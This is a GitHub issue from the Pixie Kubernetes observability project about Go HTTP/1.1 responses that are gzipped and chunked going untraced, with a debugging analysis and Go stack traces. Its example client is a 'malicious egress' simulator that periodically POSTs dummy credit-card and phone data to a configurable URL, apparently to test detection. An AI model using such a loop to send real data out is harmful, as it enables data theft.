pixie-io / pixie

Instant Kubernetes-Native Application Observability
https://px.dev
Apache License 2.0
5.58k stars 427 forks source link

Golang HTTP/1.1 gzip and chunked response data not parsed. #495

Open sync-by-unito[bot] opened 2 years ago

sync-by-unito[bot] commented 2 years ago

The following golang client does not get traced by Pixie:

    url, exists := os.LookupEnv("EGRESS_URL")
    if !exists {
        log.Fatal("Must specify EGRESS_URL in environment to run malicious egress. See README.md.")
    }

    jsonData := []byte(`{
      "name": "Pixie Pixienaut",
      "cc":"5105-1051-0510-5100",
      "phone":"555-555-0100"
    }`)

    client := &http.Client{
        Transport: &http.Transport{
            TLSNextProto:       map[string]func(string, *tls.Conn) http.RoundTripper{},
            //DisableCompression: true,
        },
    }

    t := time.NewTicker(exfilPeriod)
    for range t.C {
        resp, err := client.Post(url, "application/json", bytes.NewReader(jsonData))
        if err != nil {
            log.Printf("Error: %v", err)
            continue
        }
        log.Printf("POST returned code: %d", resp.StatusCode)
    }Uncommenting `DisableCompression: true` leads to it being traced by PixieDigging into the conn trace logs I noticed that it parses the request fine, but fails to parse the response with error `kNeedsMoreData`

The response when DisableCompression == false is gzipped and chunked, whereas when that is set to true the response is simply content length encoded. So I believe its an issue with the combination of gzipping and chunking of the body that gives our parser a problem.

See https://pixie-labs.atlassian.net/browse/PP-3401 for related issues.

┆Issue is synchronized with this Jira Bug by Unito

sync-by-unito[bot] commented 2 years ago

➤ James Bartlett commented:

Had some time so I investigated this further.

So crypto/tls.(Conn).Read (which is where we put our Uprobes) is wrapped by a bufio.Reader which buffers read calls to the underlying crypto/tls.(Conn). So when you do a TLS request in golang it will call Peek on the bufio.Reader in order to determine the status code, headers, etc of the response. Peek in turn calls Read on the underlying Conn, if its not already in the bufio.Reader's buffer. However, the golang net stack does not continue to call Peek or Read once it knows the status, headers, etc. Instead it wraps the Reader and passes to the application in the form of resp.Body. So if resp.Body.Read is never called, then the underlying crypto/tls.(Conn) may never have all of its data read, since it depends how much data the first Peek call reads. This is why things work when the response was not chunked, since the entire response was already buffered in the Conn when Peek was called, leading to our uprobes tracing the full response from crypto/tls.(Conn).Read. But when the response was chunked, the last 0 sized chunk comes in after the Peek call leading to our probes never seeing the last 0-sized chunk, so the HTTP parser thinks that it needs more data to fully parse the request. Calling ioutil.ReadAll(resp.Body) causes the req/resp to be traced by Pixie.

Not really sure what we should do about this, since its probably not that common for a client to completely ignore the response body, but at the same time I think we should probably still at least show the request in this case.

The function of particular interest to the above is: net/http/transport.go (*persistConn) readLoop

this is the stack from a call to crypto/tls.(*Conn).Read caused by the readLoop peeking:

    crypto/tls.(*Conn).Read+0                                                                       
    bufio.(*Reader).fill+259                                                                                                                                                                                                                                                                                                                                                                                                 
    bufio.(*Reader).Peek+93                                                                         
    net/http.(*persistConn).readLoop+428                                                                                                                                                                                                                                                                                                                                                                                     
    net/http.(*Transport).dialConn.dwrap.118+38
    runtime.goexit.abi0+1   this is the stack in the context of `resp.Body.Read` being called:

    crypto/tls.(*Conn).Read+0
    bufio.(*Reader).fill+259
    bufio.(*Reader).ReadSlice+47
    net/http/internal.readChunkLine+37
    net/http/internal.(*chunkedReader).beginChunk+40
    net/http/internal.(*chunkedReader).Read+302
    net/http.(*body).readLocked+60
    net/http.(*body).Read+293
    net/http.(*bodyEOFSignal).Read+322
    bufio.(*Reader).Read+436
    io.ReadAtLeast+154
    compress/gzip.(*Reader).readHeader+150
    compress/gzip.(*Reader).Read+718
    net/http.(*gzipReader).Read+363
    io.ReadAll+254```